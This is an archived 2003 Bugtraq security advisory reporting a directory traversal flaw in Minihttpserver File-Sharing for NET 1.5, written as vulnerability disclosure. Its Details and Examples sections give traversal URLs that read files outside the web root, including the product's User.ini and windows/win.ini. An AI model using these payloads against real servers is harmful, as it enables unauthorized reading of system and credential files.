[31945] in bugtraq
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
daemon@ATHENA.MIT.EDU (Bahaa Naamneh)
Fri Oct 3 13:37:07 2003
Date: 3 Oct 2003 13:14:28 -0000
Message-ID: <20031003131428.1897.qmail@sf-www2-symnsj.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Bahaa Naamneh <b_naamneh@hotmail.com>
To: bugtraq@securityfocus.com
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Affected Systems: File-Sharing for NET
version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003
Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."
- Vendors Description
[ http://www.minihttpserver.net ]
Details:
========
File-Sharing for NET has a Directory Traversal Vulnerability Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.
http://[target]/../../../existing_file
http://[target]\..\..\..\existing_file
Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini
http://127.0.0.1/../../../windows/win.ini
Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:
http://www.minihttpserver.net/fbbs.zip
Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh@hotmail.com
http://www.bsecurity.tk
